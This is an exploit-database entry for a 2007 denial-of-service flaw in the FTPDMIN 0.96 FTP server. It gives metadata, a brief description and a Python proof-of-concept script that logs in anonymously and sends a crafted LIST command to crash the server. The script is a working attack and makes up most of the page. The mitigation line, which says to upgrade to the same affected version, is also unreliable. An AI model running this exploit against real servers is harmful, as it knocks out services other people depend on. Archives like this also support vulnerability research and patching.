FTPDMIN v. 0.96 LIST Denial of Service

vendor:

FTPDMIN

by:

shinnai

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: FTPDMIN

Affected Version From: 0.96

Affected Version To: 0.96

Patch Exists: YES

Related CWE: N/A

CPE: a:sentex:ftpdmin:0.96

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2007

FTPDMIN v. 0.96 LIST Denial of Service

A denial of service vulnerability exists in FTPDMIN v. 0.96. By sending a specially crafted LIST command with an overly long string, a remote attacker can cause the application to crash.

Mitigation:

Upgrade to the latest version of FTPDMIN v. 0.96

Source

Exploit-DB raw data:

# usr/bin/python

import socket
import time

print
"-----------------------------------------------------------------------"
print "# FTPDMIN v. 0.96 LIST Denial of Service"
print "# url: http://www.sentex.net/~mwandel/ftpdmin/"
print "# author: shinnai"
print "# mail: shinnai[at]autistici[dot]org"
print "# site: http://shinnai.altervista.org"
print
"-----------------------------------------------------------------------\n"

buff = "//A:"

user = "anonymous"
password = "shinnai"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
   conn = s.connect(("127.0.0.1",21))
   d = s.recv(1024)
   print "Server <- " + d
   time.sleep(2)

   s.send('USER %s\r\n' % user)
   print "Client -> USER " + user
   d = s.recv(1024)
   print "Server <- " + d
   time.sleep(2)

   s.send('PASS %s\r\n' % password)
   print "Client -> PASS " + password
   d = s.recv(1024)
   print "Server <- " + d
   time.sleep(2)

   s.send('LIST %s\r\n' % buff)
   print "Client -> LIST " + buff
   d = s.recv(1024)
   print d
   time.sleep(2)

except:
   print "- Unable to connect. exiting."

# milw0rm.com [2007-03-20]